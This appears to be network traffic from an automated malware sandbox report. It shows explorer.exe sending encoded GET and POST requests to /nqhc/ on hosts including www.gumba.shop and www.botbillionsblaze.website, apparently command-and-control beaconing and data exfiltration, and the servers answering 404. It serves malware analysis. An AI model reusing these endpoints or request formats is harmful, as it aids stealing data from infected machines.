                                                                                                                                                                                    Nov 21, 2022 19:21:20.676736116 CET818OUTData Raw: 63 4a 6a 6f 39 7a 6c 50 69 38 41 49 54 4a 63 2d 43 6d 4c 35 72 35 6c 67 61 66 65 4f 66 5f 78 62 61 6e 6b 4e 39 6f 44 4c 78 52 64 66 73 41 59 36 42 45 4d 59 4c 69 5a 36 4a 65 7e 66 72 62 6d 4c 4d 54 44 5f 33 4a 52 33 58 74 5a 79 6a 4d 32 5f 65 69
                                                                                                                                                                                    Data Ascii: cJjo9zlPi8AITJc-CmL5r5lgafeOf_xbankN9oDLxRdfsAY6BEMYLiZ6Je~frbmLMTD_3JR3XtZyjM2_ei~01hqi8hns0tTRgHImq06aFriOpzl9CDG0L7wH4GNds62H0C12RMJdslcUgToKsi31pa26i50H(3YMew6wNe4U0W8-qrPFu5yNvXjsWxjKYpCh3_C1K-et1IjmhK26OCmsnerp18FJhjE2G1DMWVuuu7hU4aobo_E
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823056936 CET821OUTData Raw: 36 6f 63 77 37 65 79 68 53 6b 31 6d 71 70 7a 6b 78 6c 77 7a 79 5f 61 52 32 33 5a 65 47 33 49 31 65 75 45 76 52 6e 45 76 6b 6e 62 64 4b 59 46 44 62 57 35 55 6d 32 62 35 46 62 43 67 79 63 6e 61 54 52 5a 74 74 4a 79 47 49 48 74 78 45 74 45 4d 4c 66
                                                                                                                                                                                    Data Ascii: 6ocw7eyhSk1mqpzkxlwzy_aR23ZeG3I1euEvRnEvknbdKYFDbW5Um2b5FbCgycnaTRZttJyGIHtxEtEMLf6xEOtz(MmrrnC1o34zWIK_u4lm71wr8SLtsjhiyL~y(d8RHeZnvLF2LjDaJIRWVOK8rldgeDYY3cyry_zstJiIJfDS4D5YprFOGKD0ZfqRE51eeyMmNit46dWr55Qq2RMf3SvD6yEqsWIPMfI7p8ZAA9XcFAXqWZ8
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823108912 CET828OUTData Raw: 46 58 43 42 7a 59 32 72 61 35 63 64 32 4a 4b 6f 49 35 53 71 76 71 6b 68 5a 6c 58 75 31 44 66 68 71 4c 6d 35 6a 61 77 34 56 5a 61 53 34 73 48 78 4d 64 51 50 75 6e 7a 75 30 76 66 72 4a 63 48 62 6c 5f 66 45 39 47 50 39 34 38 62 34 57 68 6d 61 4f 5f
                                                                                                                                                                                    Data Ascii: FXCBzY2ra5cd2JKoI5SqvqkhZlXu1DfhqLm5jaw4VZaS4sHxMdQPunzu0vfrJcHbl_fE9GP948b4WhmaO_u9Oz2FPtq_G-x2coOjvY5QIjM-3UEW1bd5(Eq4338cdnHcPlkT1jILbASV3i3UnmWY3gWhrBcNR8fBSD79J0OD8yDhF2Dh7HYrUIJUBzZIn_K2SBYfaoai(VeHKPkCnEhp~LMiiByeK1e6OYhoVTBzmFRmru(BKrb
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823339939 CET832OUTData Raw: 6e 4e 76 62 50 6b 38 72 37 41 59 37 56 47 61 6d 5a 55 52 78 4d 6f 28 30 4a 71 33 57 67 37 44 69 49 78 76 6a 67 65 39 59 58 59 72 7a 57 4e 51 50 7e 77 37 4d 35 4a 43 47 52 4a 49 37 71 66 76 41 6f 38 51 53 6f 72 61 52 34 32 4b 67 46 7a 56 6f 6c 65
                                                                                                                                                                                    Data Ascii: nNvbPk8r7AY7VGamZURxMo(0Jq3Wg7DiIxvjge9YXYrzWNQP~w7M5JCGRJI7qfvAo8QSoraR42KgFzVolegk8gnSO4zpjsTa9WKLs21W4wZpAzz0r_cNatoP5frKE86IwFp7odcLdLoHVHN2~9G6YMwdHpNlp3KB2fch9CUDxgsOl1JlqIWwW_~uJer6JE2YZJDy8yEisYbMLmFCpUkFjPee3-d1dsspGEvXNm~PCF9EoIZGPty


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    22192.168.11.20498473.13.90.7680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:22.700804949 CET833OUTGET /nqhc/?r4txB=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.gumba.shop
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:21:22.848660946 CET833INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:22 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: nginx/1.16.1
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    23192.168.11.20498482.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:28.129893064 CET835OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.botbillionsblaze.website
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.botbillionsblaze.website
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 74 49 62 4a 66 41 68 52 71 43 52 4d 49 47 52 69 76 5a 75 50 35 61 70 4c 47 30 7e 49 48 47 4b 36 61 36 42 64 71 72 46 39 31 53 53 38 65 43 45 79 73 31 59 37 52 49 59 35 7e 43 68 30 54 62 64 6e 6b 6b 6b 59 32 70 72 56 61 76 30 6a 70 63 47 44 64 53 51 53 43 6b 32 56 43 43 61 52 65 39 5a 68 54 50 4b 4e 42 78 34 51 6e 78 6d 75 36 6a 62 30 79 6a 6b 49 61 47 4d 44 65 34 6b 39 61 47 50 67 59 55 4f 4b 68 79 4e 54 70 53 52 54 33 46 4b 6c 39 69 34 52 70 58 62 33 68 38 4b 52 5a 55 52 48 67 62 52 4e 56 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=EqVrxMRHLBCwtIbJfAhRqCRMIGRivZuP5apLG0~IHGK6a6BdqrF91SS8eCEys1Y7RIY5~Ch0TbdnkkkY2prVav0jpcGDdSQSCk2VCCaRe9ZhTPKNBx4Qnxmu6jb0yjkIaGMDe4k9aGPgYUOKhyNTpSRT3FKl9i4RpXb3h8KRZURHgbRNVw).
                                                                                                                                                                                    Nov 21, 2022 19:21:28.157994032 CET835INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:28 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 146
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    24192.168.11.20498492.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:30.190305948 CET837OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.botbillionsblaze.website
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.botbillionsblaze.website
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 69 49 72 4a 61 6a 5a 52 28 53 52 50 57 57 52 69 32 70 75 78 35 61 56 4c 47 31 71 59 48 77 61 36 64 65 4a 64 34 75 6c 39 79 53 53 38 57 69 45 33 6a 56 59 79 52 49 63 48 7e 48 5a 30 54 62 4a 6e 6c 56 45 59 33 5a 72 61 52 50 30 73 68 38 47 34 4d 43 51 4d 43 6b 4b 33 43 44 4f 52 65 4e 46 68 43 35 57 4e 51 31 56 47 71 78 6d 67 38 6a 62 37 70 7a 6b 4f 61 47 78 30 65 36 6b 4c 5a 77 48 67 59 31 75 4b 67 79 4e 53 77 79 52 49 72 31 4c 56 7e 68 6c 37 69 6c 66 55 37 38 53 2d 64 45 63 4b 30 4a 4e 4a 4b 61 46 48 68 62 7e 66 57 66 50 56 41 59 63 76 32 4d 33 79 72 2d 6e 59 32 62 59 65 6e 39 68 35 41 4f 63 57 56 77 7a 50 46 4b 65 33 6a 6f 48 7a 46 68 6d 53 46 36 31 4d 64 71 38 32 71 62 38 33 28 33 71 6a 32 53 46 2d 32 46 37 79 43 6f 79 50 74 4c 78 76 35 55 63 79 4f 43 4a 73 65 49 35 73 47 47 7e 79 6b 67 6b 49 52 4e 77 59 66 52 54 73 76 36 39 72 4b 66 39 4a 6d 51 63 64 31 67 59 62 31 47 66 71 44 45 56 6f 32 4a 49 6f 6f 32 67 54 32 54 47 5a 28 7a 44 4f 6d 41 5a 4e 58 7a 73 47 4a 69 76 62 37 2d 47 35 69 31 55 62 50 46 53 52 46 52 32 65 41 32 67 72 51 6c 4d 67 44 56 51 79 35 50 4e 32 41 49 31 59 63 57 38 74 6c 4d 34 30 43 71 33 6c 46 73 50 6c 50 66 45 45 52 63 70 32 55 4b 74 46 71 6a 53 43 4e 51 50 65 35 35 56 43 4e 79 73 47 65 6d 46 4b 30 37 54 33 6f 6c 36 4f 7a 66 4d 70 66 75 5a 5a 71 5f 45 36 6a 31 50 45 75 62 72 76 35 33 43 59 31 71 4e 47 6a 6c 54 6d 42 42 76 65 78 39 73 4b 73 73 4e 4a 6f 45 28 6a 46 67 63 72 75 2d 38 68 4c 61 72 6c 58 7a 71 30 77 5f 50 4e 53 46 6d 4f 68 49 55 42 5a 4e 42 5a 49 2d 46 79 35 5f 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=EqVrxMRHLBCwiIrJajZR(SRPWWRi2pux5aVLG1qYHwa6deJd4ul9ySS8WiE3jVYyRIcH~HZ0TbJnlVEY3ZraRP0sh8G4MCQMCkK3CDOReNFhC5WNQ1VGqxmg8jb7pzkOaGx0e6kLZwHgY1uKgyNSwyRIr1LV~hl7ilfU78S-dEcK0JNJKaFHhb~fWfPVAYcv2M3yr-nY2bYen9h5AOcWVwzPFKe3joHzFhmSF61Mdq82qb83(3qj2SF-2F7yCoyPtLxv5UcyOCJseI5sGG~ykgkIRNwYfRTsv69rKf9JmQcd1gYb1GfqDEVo2JIoo2gT2TGZ(zDOmAZNXzsGJivb7-G5i1UbPFSRFR2eA2grQlMgDVQy5PN2AI1YcW8tlM40Cq3lFsPlPfEERcp2UKtFqjSCNQPe55VCNysGemFK07T3ol6OzfMpfuZZq_E6j1PEubrv53CY1qNGjlTmBBvex9sKssNJoE(jFgcru-8hLarlXzq0w_PNSFmOhIUBZNBZI-Fy5_E.
                                                                                                                                                                                    Nov 21, 2022 19:21:30.229234934 CET837INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:30 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 146
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    25192.168.11.20498502.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:32.237010956 CET844OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.botbillionsblaze.website
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.botbillionsblaze.website
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 69 49 72 4a 61 6a 5a 52 28 53 52 50 57 57 52 69 32 70 75 78 35 61 56 4c 47 31 71 59 48 77 53 36 64 70 4a 64 71 50 6c 39 7a 53 53 38 56 69 45 32 6a 56 5a 67 52 49 6b 39 7e 48 46 65 54 5a 78 6e 6c 45 55 59 30 76 28 61 55 50 30 74 69 38 47 41 64 53 51 59 43 6b 32 72 43 44 61 65 65 39 42 68 54 4f 36 4e 42 55 55 51 79 78 6d 75 38 6a 62 6e 28 44 6c 74 61 47 31 6b 65 36 34 4c 5a 79 7a 67 61 48 6d 4b 73 46 68 53 71 53 52 58 67 56 4c 61 30 42 6c 65 69 68 28 71 37 38 53 49 64 46 6f 4b 30 4c 56 4a 4c 5a 64 45 68 37 7e 66 49 76 50 53 45 59 52 6b 32 4d 62 55 72 2d 37 59 32 5a 6f 65 6c 64 68 35 56 66 63 52 57 51 79 45 42 4b 65 6b 6e 6f 44 37 46 68 61 47 46 34 35 4d 64 36 6f 32 77 4b 38 33 38 56 4f 6a 7e 53 46 38 79 46 37 74 55 59 7a 51 74 4c 42 7a 35 56 39 50 4f 46 4a 73 59 6f 5a 73 51 55 47 78 6a 41 6b 4b 64 74 77 42 4a 68 66 6f 76 2d 5a 38 4b 66 39 6a 6d 55 6b 64 31 52 6f 62 30 48 66 74 41 55 56 56 76 5a 49 48 6d 57 6c 53 32 54 61 52 28 79 37 65 6d 43 31 4e 56 54 73 47 66 52 47 4e 69 65 47 2d 36 46 55 4a 51 56 54 52 46 52 72 39 41 33 6b 52 58 52 45 67 41 46 41 79 7e 66 4e 31 43 6f 30 52 57 32 38 52 30 63 34 30 43 71 36 42 46 70 58 6c 4f 74 55 45 52 72 74 32 52 5a 56 46 73 6a 54 4a 4e 51 4f 61 35 35 52 48 4e 79 6c 52 65 6d 5a 77 30 34 28 33 70 77 6d 4f 30 65 4d 75 62 65 5a 51 75 5f 46 69 75 56 44 70 75 62 6e 64 35 33 54 76 79 5a 5a 47 69 6c 44 6d 46 42 76 66 37 39 73 4e 36 38 4e 62 28 55 44 4a 46 67 42 63 75 5f 35 2d 4c 59 37 6c 58 53 4b 76 67 75 66 71 4d 31 32 5a 6a 4d 55 43 52 4c 5a 46 61 72 70 73 6e 5a 71 7a 68 33 44 42 5a 74 33 55 78 59 67 55 31 62 69 6e 4c 44 4a 41 71 54 6b 56 72 6b 76 55 35 5f 4a 55 79 4d 6e 38 63 76 76 4e 57 31 74 4d 56 48 46 41 61 37 70 75 74 55 77 4f 64 53 66 45 59 5a 47 67 35 43 6c 69 68 30 51 7a 28 56 32 75 36 39 67 58 42 32 7e 43 4a 6e 63 4b 32 5a 61 70 4c 76 32 47 33 79 61 67 61 6f 69 77 33 47 6e 44 62 39 34 75 30 69 4c 53 54 63 6f 56 74 41 6f 72 62 70 44 73 46 64 6f 6a 41 73 46 66 42 75 6d 33 41 48 71 73 7e 48 57 50 77 52 44 6e 28 6f 35 56 49 62 35 30 47 7a 56 70 43 5f 5a 5a 75 4f 6e 77 42 50 43 2d 28 47 7a 62 54 2d 48 37 59 35 75 32 48 4f 72 6e 56 62 69 77 4d 43 4b 4b 28 7a 78 30 54 76 78 75 48 78 38 42 31 38 49 32 47 6b 4c 35 70 70 72 4f 77 38 4d 58 31 39 6c 4c 76 48 68 44 79 6b 4a 6a 59 52 46 71 6a 43 69 6a 46 66 79 45 57 66 73 38 55 69 59 50 43 32 58 66 68 57 50 37 6c 37 50 32 44 5a 30 69 75 46 4f 39 36 78 35 41 48 5f 69 75 76 52 77 65 79 36 4f 56 54 32 57 78 67 70 65 58 50 79 51 46 4c 31 36 68 7a 55 4a 31 50 77 67 71 48 41 6b 53 6b 44 6f 63 71 64 7a 65 55 45 36 79 42 66 77 68 33 78 79 70 57 39 7e 75 45 39 76 49 35 43 67 4d 6d 6c 6d 33 70 65 41 59 46 78 33 4c 45 72 39 49 73 49 78 2d 4f 4b 51 7a 38 55 78 72 56 30 4b 49 5a 4a 55 31 7e 2d 45 7a 28 6a 68 5f 78 70 4b 4b 59 7a 63 39 72 6e 63 77 46 4d 6c 77 39 37 63 62 35 4e 61 66 6c 47 43 73 70 64 53 73 38 72 69 39 70 62 46 43 46 4b 6c 36 6a 57 4c 79 50 35 55 4b 39 69 72 31 6e 6d 6a 4c 36 41 58 45 4c 6b 4b 56 62 39 75 6d 51 37 7e 34 67 57 6a 52 65 69 47 39 59 39 47 6e 31 2d 6b 36 36 56 42 41 34 36 30 35 77 30 51 5f 54 5f 73 6a 51 2d 4a 37 4c 67 30 49 79 76 6f 57 6b 57 5a 45 30 53 64 51 38 71 69 4e 55 74 30 75 53 78 68 4d 35 45 33 70 61 30 28 32 45 6a 36 65 41 58 71 57 59 4c 53 48 77 43 31 4d 33 46 58 7a 61 6c 6b 79 49 56 77 44 79 51 64 35 56 64 62 46 65 68 59 5a 45 53 77 2d 6b 66 52 46 75 62 28 55 46 7a 7a 36 76 54 31 62 7e 77 6d 31 35 6d 4d 33 7a 4d 68 64 65 72 63 72 31 70 6e 4e 7e 44 78 43 39 57 59 5a 49 4b 43 34 37 6a 71 56 68 66 30 51 48 4d 53 51 4e 73 5a 63 75 49 62 6e 67 57 54 38 55 51 6d 2d 32 45 6f 6c 43 58 44 59 6d 48 48 35 6d 6d 65 4c 62 32 31 73 4a 59 39 65 70 35 58 6d 54 37 46 79 4e 4f 7a 30 74 64 28 66 6e 56 4e 61 42 79 6a 46 75 70 76 4c 42 6e 79 4d 41 67 6c 30 71 2d 34 74 70 30 66 6e 73 65 6a 77 34 6d 6c 33 44 42 7e 42 51 4b 72 47 62 46 37 53 4f 65 64 34 4f 30 79 4d 76 65 48 4e 45 6f 54 78 4f 35 53 55 6c 49 6f 51 48 66 66 57 45 47 4f 71 46 50 68 67 76 65 4e 66 77 47 4b 41 66 6b 42 53 39 47 7a 47 6c 49 4f 53 64 66 31 45 50 4e 6a 71 69 30 43 5a 64 34 44 54 77 4f 59 53 52 65 64 7a 4e
                                                                                                                                                                                    Data Ascii: r4txB=EqVrxMRHLBCwiIrJajZR(SRPWWRi2pux5aVLG1qYHwS6dpJdqPl9zSS8ViE2jVZgRIk9~HFeTZxnlEUY0v(aUP0ti8GAdSQYCk2rCDaee9BhTO6NBUUQyxmu8jbn(DltaG1ke64LZyzgaHmKsFhSqSRXgVLa0Bleih(q78SIdFoK0LVJLZdEh7~fIvPSEYRk2MbUr-7Y2Zoeldh5VfcRWQyEBKeknoD7FhaGF45Md6o2wK838VOj~SF8yF7tUYzQtLBz5V9POFJsYoZsQUGxjAkKdtwBJhfov-Z8Kf9jmUkd1Rob0HftAUVVvZIHmWlS2TaR(y7emC1NVTsGfRGNieG-6FUJQVTRFRr9A3kRXREgAFAy~fN1Co0RW28R0c40Cq6BFpXlOtUERrt2RZVFsjTJNQOa55RHNylRemZw04(3pwmO0eMubeZQu_FiuVDpubnd53TvyZZGilDmFBvf79sN68Nb(UDJFgBcu_5-LY7lXSKvgufqM12ZjMUCRLZFarpsnZqzh3DBZt3UxYgU1binLDJAqTkVrkvU5_JUyMn8cvvNW1tMVHFAa7putUwOdSfEYZGg5Clih0Qz(V2u69gXB2~CJncK2ZapLv2G3yagaoiw3GnDb94u0iLSTcoVtAorbpDsFdojAsFfBum3AHqs~HWPwRDn(o5VIb50GzVpC_ZZuOnwBPC-(GzbT-H7Y5u2HOrnVbiwMCKK(zx0TvxuHx8B18I2GkL5pprOw8MX19lLvHhDykJjYRFqjCijFfyEWfs8UiYPC2XfhWP7l7P2DZ0iuFO96x5AH_iuvRwey6OVT2WxgpeXPyQFL16hzUJ1PwgqHAkSkDocqdzeUE6yBfwh3xypW9~uE9vI5CgMmlm3peAYFx3LEr9IsIx-OKQz8UxrV0KIZJU1~-Ez(jh_xpKKYzc9rncwFMlw97cb5NaflGCspdSs8ri9pbFCFKl6jWLyP5UK9ir1nmjL6AXELkKVb9umQ7~4gWjReiG9Y9Gn1-k66VBA4605w0Q_T_sjQ-J7Lg0IyvoWkWZE0SdQ8qiNUt0uSxhM5E3pa0(2Ej6eAXqWYLSHwC1M3FXzalkyIVwDyQd5VdbFehYZESw-kfRFub(UFzz6vT1b~wm15mM3zMhdercr1pnN~DxC9WYZIKC47jqVhf0QHMSQNsZcuIbngWT8UQm-2EolCXDYmHH5mmeLb21sJY9ep5XmT7FyNOz0td(fnVNaByjFupvLBnyMAgl0q-4tp0fnsejw4ml3DB~BQKrGbF7SOed4O0yMveHNEoTxO5SUlIoQHffWEGOqFPhgveNfwGKAfkBS9GzGlIOSdf1EPNjqi0CZd4DTwOYSRedzNyPYuX3yaUp47ZNEA6gr6N7siB5noOsCYuA89QGkKJMJ3cA3p4uPkEr0oxj3JzQxaRY3jR7QQa0sB988ShXtp1ESKZGNJQAJaqRgpZ4d~KyizngnQS6VBY38zzrj41dOcAm2b31w9eLqfTidFc0eCrDi(QRINHLPfYgI7V83jwv01JEFEz049oNl86vUIghru8Vd1_y5OidPLdb3Po(R6uUniDwZH1aHJrTT1r3y6pJjx5tUYyu-H8sM4l(hccCP~orQ(Dmpm_RG3uqwSA~aDIeNBtI-zfsSWNCjaY8nhe8TbWS1R1bMb7NKl4hZBfkBKmp8i1JPyiKNEoJNq-lzezgNsC8oIgY1psPJmZHgYXH7QA5FkYW5ymKvleLMFCvprsBgwldGEP60Se3F0rIjDBASQbQz5ya8jo9V4y15FQbBEgUyuAlWGV3LncPjlBOQtFbWFxtMpkaruvmwP220i0~ad3tOagMYnuQPWJX49DC12nlyosFM4lfVrrGIrjzqi-uGJ7yH350Q9OQP4EXLoIOaO9i6r9qweZqZUdqVzlPxZ_MkaPXFjDct39AuRfL2vcjONNQ_qxhmrGujAbJpSx~hBwKqz4sXXo3cEsZ0VBy9yX7t9QFRiL(oI_RzjNKClhzOhVS-oJ82LXu6kRzcdPGhY2jS1N~yV9MZNyfIfP9ji-l_JgjySu5v1ArUe-MHHur5CNdIXTmhWymRq7KS8x17fFh4OxbJS1D1ytJ-xpQJ4puP8o8bIk(YGblOrHd-bvyKhwEL2mGR4_Ejvvec~xflDQm_G2w2DRExWeyfTYydTqo9B026xnmbJCqVq-~IqrLpyC0y(OJbncZ7oIJ6E6rKACh1LoF_42SrAahv9YH6PUwhKMcmSHktV_oWto217JJV13oc21M7PTzFWbacrEafagypWfi84yl70oMm7sGpdDFV5lrMYhs4Sd3rg4o4arH_ry84dMIjr55zvw43ut4ZKmP_rIfkiK4QHfQCwTXLx9YI(ke_UMlghr(-qwowXaMUxXPN3jyqCcD4uUWO33nZ7fx9bhOCMZ30JbLERc7Rf3SdEN5JY89MxRChv3detFxbzb(VFVLr27RDLmou(a67TEoUs4K2ZVTxCr1PyeQzuGFuFaD1wP5ad6JOyHq4Tus6KhFyWlYQWIHyozssZsPnYPgk5WL9b18yV1skNqRcJxT5Ex3hHwXwbXZmXKgVMpJv0k(6PVs9uelbbpXg7DNXon0Z92Ea9ZDNdjU-ur4WHcbht8u6aQXNZosF1im782CPcYEDbe2zYUAmBc8qDkbP0q0v6VypcRDL~FGV76y4wXEckVYF6ArIhmVpCNDUNAdxfyruF5tFF1~8jfj67URcX0TweO7cyAyPIUPEZJGCLSpn(A1PzyMJ~WtPERwsVNVMX9vaS2RfQYOUgDf_Kkj1(WwGGBW0b3ftlLCV6T8BoFUUdDiyUdL0HJiAh9MhohG0du0uXYV4IkNF9GqPQmP02EzCIOd8RrVE(oWnKsYNv7ngXVLhugT-2Xd2yMRvUAaYtvtlBBTVpGlOYySzkTWGplgle4XEk3U11DzW(PiNHN7jCW5XZIYmx4x4sbMzGnW5tCzOJAiS~5nh(JnFrnx2Ox1mRw9Hwb0WSC2pWadHSe1Lv9OooDqgnPpNdKELq7W1q_cBF8beAf4v(37ZTAmalA09sAul1Mha6V0CjiNPjIa2HdAJMds9ipQ0uEPgnPz25eBZhNJCXGKZcUGcoDUYRSLOwt68tBkXmCQ9nczM2DhG0UfqRmvDU9lxk6JohKaIzhh4tQc1Jzt1Ul2_ZtMF7maFCI1-vYAy4r(JEGmfjIwkyWm5anCR5H10wpk-qAjcnheFCOnd0lNHBSzsnN5IM4zxawDeABt-Lqsh8dgJ2JRg9ur76n4jOAhWSvyfv5oaPU5qoE0LAvM575AFHgHOfISxpYhJGad5AM2mvXwUl0ozmhzhSQWblke9ParlsVDZxLXUlA6vOyFm4QaRgPt8sH1IJn1FXMhz8rX_8QpRTRbpFes2qMhkAQ3HINS-sWlh2qLIs2dmziX86eQE(uu-a-7XmeHSmEUn9sccvdCw4n1ccbiNfScVBxKxKE(HoqzNrWEQM347q_m6~Qg_pa05oQa5u0y2jLGXtb6fP6jQOUL9zxt2dzTeFFVCZw5TyX8fJ3pVtPBNsGQu8YZlUKmmjhbljMgJU5SEtwkSvunGl9b3uH1T6qnyWChbA9hx59NQcVIZ5SL5K-F-49xSetATqOK7RL9FkDyh8pOH4KlZjoz4M1DkbmFMieWy2s7erxNbShpBtEg_vMBWWUKWIPsCUd~m2Rmh2C6Z5Dpbllqyku5hKozw4W~7tao-DTOXayF2BmdDAcANH6VImalsTuzyZjRHjvR0wAoxKe7KKXh742ZorDfpXGl7oOMn7nHGWqyOVhAyvl8FTFmdyFXpwOxBVQaDklhw86jH(GPtb3DjBgZeA_puDdo9~R5XZFkXAJDRgkj2ZmkZX51TiP7RQG1mEhU6yBUfsX7LSDI8MVWMjst57SUnsUaAxDTgDLx8Bv~qw1V_~yFKCNAUgjSIHxx8os5ZqIZVUOZbpl(fc3fiNOXuF1gOMHevEYY-(C0aKeg5pcViZJ7q9ghGlXYDxWtYynNAgY7B8ahA9pGbs7p79K~Zbg5ykENQ5z4_